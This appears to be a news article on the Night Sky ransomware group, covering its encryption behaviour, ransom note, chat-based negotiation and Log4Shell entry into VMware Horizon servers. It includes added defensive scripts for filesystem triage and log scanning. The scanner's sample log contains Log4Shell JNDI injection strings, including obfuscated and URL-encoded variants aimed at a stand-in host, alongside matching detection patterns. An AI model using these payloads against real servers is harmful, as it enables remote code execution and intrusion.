A newly discovered ransomware operation called Night Sky has joined the threat groups targeting VMware Horizon servers, breaching corporate networks and stealing data to extort its victims.
According to researchers, the Night Sky operation began at the end of last December and claimed several corporate victims within a short period. The ransomware first came to light when the group published data stolen from its first two victims.
The group runs a Tor data leak site that currently lists two victims: one organisation based in Bangladesh and a corporate network in Japan. From one of them the attackers demanded roughly $800,000 for a decryptor, threatening to publish the exfiltrated data if the ransom was not paid promptly.
When executed, the payload encrypts every file on the host except those with the [.]exe or [.]dll extensions; leaving executables and libraries intact keeps the system bootable so the victim can read the demand.
Encrypted files receive the [.]nightsky extension, and a ransom note named ‘NightSkyReadMe[.]hta’ is dropped in every folder, containing further instructions and information on how to make the payment.
The note lists email addresses and the URL of a clear-web ‘Rocket[.]Chat’ instance the group uses for negotiations. Only the victim can reach the chat, because the credentials needed to log in to the Rocket[.]Chat URL are printed inside the ransom note itself.
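The behaviour described above (files renamed with .nightsky, executables and libraries skipped, a NightSkyReadMe.hta note in every folder) is enough to write a filesystem triage check. The following is an added example, not code from the article or from the ransomware; it sweeps a directory tree and reports which folders were touched, using a sample tree constructed in a temporary directory so it runs offline.

```python
"""Filesystem triage for the Night Sky indicators described above.

Added example, not part of the original article or the ransomware. It walks
a directory tree and reports files carrying the '.nightsky' extension,
'NightSkyReadMe.hta' ransom notes, and the .exe/.dll binaries the payload is
reported to leave intact, so a responder can see which shares were touched.
The sample tree is constructed in a temporary directory (not real data).
"""
import os
import tempfile
from dataclasses import dataclass, field

ENCRYPTED_EXT = ".nightsky"
RANSOM_NOTE = "NightSkyReadMe.hta"
SKIPPED_EXTS = {".exe", ".dll"}   # extensions the payload is reported to skip


@dataclass
class Findings:
    encrypted: list = field(default_factory=list)
    notes: list = field(default_factory=list)
    untouched_binaries: list = field(default_factory=list)

    def affected_dirs(self):
        """Directories holding at least one encrypted file or ransom note."""
        return sorted({os.path.dirname(p) for p in self.encrypted + self.notes})


def sweep(root):
    """Classify every file under root by the Night Sky indicators."""
    found = Findings()
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower == RANSOM_NOTE.lower():
                found.notes.append(path)
            elif lower.endswith(ENCRYPTED_EXT):
                found.encrypted.append(path)
            elif os.path.splitext(lower)[1] in SKIPPED_EXTS:
                found.untouched_binaries.append(path)
    return found


def build_sample_tree(root):
    """Constructed sample: one hit share and one clean folder (not real data)."""
    share = os.path.join(root, "finance_share")
    clean = os.path.join(root, "untouched")
    os.makedirs(share)
    os.makedirs(clean)
    for name in ("budget.xlsx.nightsky", "contract.docx.nightsky",
                 "tool.exe", "helper.dll", RANSOM_NOTE):
        with open(os.path.join(share, name), "wb") as fh:
            fh.write(b"\x00")
    with open(os.path.join(clean, "readme.txt"), "wb") as fh:
        fh.write(b"fine")


def demo():
    """Build the sample tree, sweep it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sweep(root)


if __name__ == "__main__":
    result = demo()
    print(f"encrypted files : {len(result.encrypted)}")
    print(f"ransom notes    : {len(result.notes)}")
    print(f"affected folders: {result.affected_dirs()}")
```

Run `sweep()` against a mounted share or forensic image root rather than the sample tree; the count of untouched .exe/.dll files next to encrypted documents is itself a useful tell that the extension skip list matched what the article reports.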
Researchers link Night Sky to a China-based threat group tracked by Microsoft as DEV-0401, which has been observed deploying the ransomware. The group obtains its initial access by exploiting the Log4Shell vulnerability (CVE-2021-44228) in internet-facing VMware Horizon systems.
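Since the article names Log4Shell against VMware Horizon as the initial-access vector, the check a defender wants first is for JNDI lookup strings in the web access logs of the Horizon front end. The following is an added example, not code from the article, Microsoft or VMware. It assumes ordinary combined-format HTTP access logs and unwraps the common evasions (URL encoding, `${lower:..}`/`${upper:..}` wrappers, `${x:-y}` default-value tricks) before matching; the log lines are constructed and use RFC 5737 documentation addresses.

```python
"""Scan web access logs for Log4Shell (JNDI lookup) exploitation attempts.

Added example, not code from the article or from any vendor. Log4Shell is the
initial-access vector the article names for the VMware Horizon intrusions, and
the attempts land in ordinary HTTP access logs. Common evasions (URL encoding,
${lower:..}/${upper:..} wrappers, ${x:-y} default-value tricks) are unwrapped
before matching. Log lines below are constructed; IPs are RFC 5737 examples.
"""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} resolve to x (matching below is case-insensitive).
CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${anything:-x} resolves to the default value x; covers ${::-j} and friends.
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup itself, with the protocols Log4j 2 will actually dereference.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:", re.I)

# Constructed sample log (combined format). Lines 2-4 are attempts, 1 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jan/2022:08:14:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2022:08:14:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [03/Jan/2022:08:14:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7:1099/x}"',
    '198.51.100.7 - - [03/Jan/2022:08:14:15 +0000] '
    '"GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [03/Jan/2022:08:15:00 +0000] "GET /portal/?report=${date:yyyy} HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]


def normalize(text, max_rounds=10):
    """Peel off URL encoding and nested lookup wrappers until nothing changes."""
    text = unquote(unquote(text))          # handles double encoding as well
    for _ in range(max_rounds):
        new = CASE_WRAPPER.sub(lambda m: m.group(1), text)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line):
    """Return the protocol of the first JNDI lookup on the line, or None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, protocol, original_line) for every hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        proto = find_jndi(line)
        if proto:
            hits.append((number, proto, line))
    return hits


def demo():
    """Scan the constructed sample log and return the hits."""
    return scan(SAMPLE_LOG)


if __name__ == "__main__":
    for number, proto, line in demo():
        print(f"line {number}: jndi:{proto} lookup -> {line[:60]}...")
```

The normalisation step matters more than the final regex: a scanner that only greps for the literal `${jndi:` misses the nested-wrapper and URL-encoded variants in lines 3 and 4 of the sample. On a real Horizon host, feed it the Tomcat access logs and the request headers the platform logs, since the payload is just as often placed in User-Agent or X-Forwarded-For as in the URL.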
Ransomware remains one of the most damaging threats to organisations worldwide, and new variants and families such as Night Sky appear constantly. The steady stream of new operations is a clear sign that the business model is still profitable for the criminals behind it.